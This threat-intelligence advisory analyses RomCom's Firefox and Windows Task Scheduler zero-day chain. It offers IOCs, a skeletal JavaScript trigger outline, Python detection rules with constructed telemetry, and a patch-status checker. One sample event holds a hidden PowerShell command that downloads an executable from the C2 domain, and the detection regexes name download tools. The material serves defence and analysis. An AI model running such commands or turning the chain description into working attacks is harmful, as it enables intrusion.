
Summary for Security Leadership
The Russia-aligned RomCom APT group (also tracked as Storm-0978 or UNC2596) has been observed chaining two zero-day vulnerabilities, CVE-2024-9680 (Mozilla Firefox) and CVE-2024-49039 (Windows Task Scheduler), to deploy its backdoor with no user interaction beyond visiting a malicious page. This is the group's second known zero-day exploitation since mid-2023 and shows that it can develop or acquire stealthy attack vectors.
Key Takeaways
- Zero-click exploit: Combines Firefox RCE (CVSS 9.8) and Windows privilege escalation (CVSS 8.8)
- Delivery: Fake websites redirect to exploit servers, compromising victims who visit them with a vulnerable Firefox, Thunderbird, or Tor Browser build
- Impact: Installs RomCom backdoor capable of command execution and module downloads
- Patches: Mozilla fixed CVE-2024-9680 within 25 hours (October 9, 2024); Microsoft patched CVE-2024-49039 on November 12, 2024
- Targets: Primarily European and North American entities across government, defense, and private sectors
Technical Analysis of the Exploit Chain
Vulnerability Breakdown
CVE-2024-9680 (Firefox)
A use-after-free flaw in Firefox's animation timeline feature allowed code execution inside the browser's sandboxed content process. The exploit used JavaScript heap manipulation to trigger memory corruption in the AnimationTimeline::Tick path. On its own this gives attacker code only the restricted rights of the content process; leaving the sandbox is the job of the second bug below.
CVE-2024-49039 (Windows)
An undocumented RPC endpoint implemented in WPTaskScheduler.dll permitted a low-privileged (sandboxed) process to create scheduled tasks that run at a higher integrity level. RomCom abused this to escape the browser sandbox and execute PowerShell scripts that fetch secondary payloads from C2 servers such as journalctd[.]live.
Exploitation Workflow
- Initial Access: Victims are redirected from spoofed domains (e.g., redircorrectiv[.]com) to the exploit server.
- Firefox Exploit: The landing page triggers the use-after-free in the content process. A simplified trigger pattern based on ESET's description of the bug (not ESET's published exploit code; it only does anything against an unpatched build):

```javascript
// Simplified trigger pattern for CVE-2024-9680, based on ESET's description.
function heapSpray() {
  // Placeholder: reclaim the freed timeline memory with attacker-controlled data
  // before the stale pointer is dereferenced.
}

function triggerUseAfterFree() {
  const anim = new Animation();
  anim.ready.then(() => {
    anim.cancel(); // frees the animation while AnimationTimeline::Tick() is still iterating it
    heapSpray();   // occupy the freed slot so the dangling pointer now points at controlled data
  });
}
```

- Privilege Escalation: The content-process shellcode loads PocLowIL.dll, which abuses the Windows Task Scheduler through RPC calls to the 33D84484-3626-47EE-8C6F-E7E98B113BE1 interface to escape the browser sandbox.
- Payload Delivery: The RomCom backdoor (SHA1: ABB54C4751F97A9FC1C9598FED1EC9FB9E6B1DB6) is downloaded to the %PUBLIC% directory.
Relevance to Security Teams
For Defenders (Blue Teams)
- Detection: Monitor for process creation from conhost.exe with hidden windows, PowerShell fetching executables into public folders (e.g., %PUBLIC%), and scheduled tasks whose command points into a user-writable directory.
- IOCs:
  - Domain: journalctd[.]live (C2)
  - IP: 194.87.189.171 (Aeza hosting)
  - File: PocLowIL.dll (sandbox escape)
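The detection points and IOCs above, turned into rules and run over a handful of constructed events. This is an added example written for this page, not ESET's or any vendor's detection content; the event shape is a simplified Sysmon/Security-log-style JSON (EventID 1 process creation, 3 network, 11 file create, 22 DNS, 4698 scheduled task created), the sample events are made up, and the browser process names and regexes are assumptions. Only the domains, IPs and file name come from the IOC list on this page.

```python
"""Hunt rules for the RomCom Firefox -> Task Scheduler chain (added example)."""
from __future__ import annotations
import re

# Indicators from the page's IOC list; everything else in this file is illustrative.
IOC_DOMAINS = {"journalctd.live", "redircorrectiv.com"}
IOC_IPS = {"194.87.189.171", "62.60.238.81"}
IOC_FILES = {"poclowil.dll"}

# Assumed process names for the affected browsers/mail clients.
BROWSER_PROCS = {"firefox.exe", "thunderbird.exe", "tor.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
DOWNLOAD_RE = re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|\biwr\b|curl|wget", re.I)
PUBLIC_RE = re.compile(r"%PUBLIC%|C:\\Users\\Public", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits: list[str] = []
    eid = ev.get("EventID")
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if eid == 22 and ev.get("QueryName", "").lower() in IOC_DOMAINS:
        hits.append("dns_ioc")
    if eid == 3 and ev.get("DestinationIp") in IOC_IPS:
        hits.append("net_ioc")
    if eid == 11:
        target = ev.get("TargetFilename", "")
        if basename(target) in IOC_FILES:
            hits.append("file_ioc")
        if image in BROWSER_PROCS and PUBLIC_RE.search(target):
            hits.append("browser_write_public")  # browser dropping files into %PUBLIC%
    if eid == 1:
        if image in SHELLS and HIDDEN_RE.search(cmd) and (parent == "conhost.exe" or parent in BROWSER_PROCS):
            hits.append("hidden_shell_from_conhost_or_browser")
        if image == "powershell.exe" and DOWNLOAD_RE.search(cmd) and PUBLIC_RE.search(cmd):
            hits.append("powershell_download_to_public")
        if any(ioc in cmd.lower() for ioc in IOC_DOMAINS | IOC_IPS):
            hits.append("ioc_in_cmdline")
    if eid == 4698 and PUBLIC_RE.search(ev.get("TaskContent", "")):
        hits.append("scheduled_task_runs_from_public")  # task created to launch a user-writable path
    return hits


def analyze(events: list[dict]) -> list[tuple[int, int, str]]:
    """(event index, EventID, rule) for every hit, in event order."""
    return [(i, ev["EventID"], h) for i, ev in enumerate(events) for h in check_event(ev)]


# Constructed sample telemetry (not real logs). Events 0-4 mimic the chain; 5-6 are benign noise.
FIREFOX = "C:\\Program Files\\Mozilla Firefox\\firefox.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 22, "Image": FIREFOX, "QueryName": "journalctd.live"},
    {"EventID": 3, "Image": FIREFOX, "DestinationIp": "194.87.189.171", "DestinationPort": 443},
    {"EventID": 11, "Image": FIREFOX, "TargetFilename": "C:\\Users\\Public\\PocLowIL.dll"},
    {"EventID": 4698, "SubjectUserName": "alice", "TaskName": "\\Microsoft\\Windows\\Update",
     "TaskContent": "<Exec><Command>C:\\Users\\Public\\svchost.exe</Command></Exec>"},
    {"EventID": 1, "Image": PS, "ParentImage": "C:\\Windows\\System32\\conhost.exe",
     "CommandLine": "powershell -w hidden -c \"Invoke-WebRequest http://journalctd.live/x -OutFile C:\\Users\\Public\\u.exe\""},
    {"EventID": 1, "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -File C:\\Scripts\\backup.ps1"},
    {"EventID": 22, "Image": FIREFOX, "QueryName": "www.mozilla.org"},
]

if __name__ == "__main__":
    for idx, eid, rule in analyze(SAMPLE_EVENTS):
        print(f"event {idx} (EventID {eid}): {rule}")
```

Each rule is independent, so a single event can raise several findings (the hidden PowerShell download in event 4 trips three rules at once), which is what you want when correlating weak signals into one alert. The browser-to-%PUBLIC% and task-from-%PUBLIC% rules are behavioral and will keep catching a retooled campaign after the listed domains and IPs rotate.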
For Offensive Teams (Red Teams)
RomCom’s exploit chain demonstrates viable techniques for bypassing browser sandboxes via privileged RPC endpoints.
Remediation and Mitigation
- Patch Immediately:
  - Firefox: 131.0.2, ESR 128.3.1, ESR 115.16.1 (Thunderbird and Tor Browser shipped corresponding fixed builds)
  - Windows: Install the November 12, 2024 cumulative update (KB5046612 for Windows 10; the KB number differs by Windows version)
- Network Controls:
  - Block traffic to known C2 IPs such as 62.60.238.81 and 194.87.189.171
  - Restrict outbound PowerShell to trusted endpoints
- User Training: Highlight risks of visiting unfamiliar domains, even if redirected from legitimate-looking URLs.
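A patch-status check for the Firefox side of the remediation list. This is an added example, not tooling from Mozilla or ESET; the inventory lines are constructed. It encodes the fixed versions from Mozilla's advisory for CVE-2024-9680 (131.0.2, ESR 128.3.1, ESR 115.16.1) and the point that catches people out: a release build such as 129.x or 130.x compares greater than 128.3.1 but never received the fix and is still vulnerable.

```python
"""Flag Firefox installs still exposed to CVE-2024-9680 (added example)."""
from __future__ import annotations
import re

# First fixed build on each branch that received a patch (Mozilla advisory values).
FIXED_BY_BRANCH = {131: (131, 0, 2), 128: (128, 3, 1), 115: (115, 16, 1)}


def parse_version(version: str) -> tuple[int, int, int]:
    """'128.3.1esr' -> (128, 3, 1); missing components are treated as 0."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)  # type: ignore[return-value]


def firefox_vulnerable(version: str) -> bool:
    v = parse_version(version)
    major = v[0]
    if major >= 132:
        return False  # every later release branch ships the fix
    fixed = FIXED_BY_BRANCH.get(major)
    if fixed is None:
        return True  # e.g. 129.x/130.x or <115: no patched build exists, upgrade required
    return v < fixed


def hosts_needing_patch(inventory: list[str]) -> list[str]:
    """inventory lines look like 'hostname,firefox_version' (constructed format)."""
    out = []
    for line in inventory:
        host, _, ver = line.strip().partition(",")
        if ver and firefox_vulnerable(ver):
            out.append(host)
    return out


# Constructed inventory, not real asset data.
SAMPLE_INVENTORY = [
    "ws-01,131.0.2",       # patched release
    "ws-02,131.0.1",       # one build short
    "ws-03,128.3.1esr",    # patched ESR
    "ws-04,128.3.0esr",    # vulnerable ESR
    "ws-05,129.0.1",       # stale release branch: still vulnerable despite > 128.3.1
    "ws-06,115.16.1esr",   # patched old ESR
    "ws-07,115.15.0esr",   # vulnerable old ESR
    "ws-08,132.0",         # newer than the fix
]

if __name__ == "__main__":
    print("needs patch:", hosts_needing_patch(SAMPLE_INVENTORY))
```

Thunderbird and Tor Browser carry their own version numbering for the same fix, so gate them with their vendors' fixed versions rather than reusing this table.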
Conclusion
The RomCom campaign underscores the growing sophistication of APT groups in weaponizing zero-days for stealthy intrusions. Rapid patch deployment—as demonstrated by Mozilla’s 25-hour turnaround—remains critical to mitigating such threats. Organizations should prioritize monitoring for anomalous scheduled task creation and browser process behavior.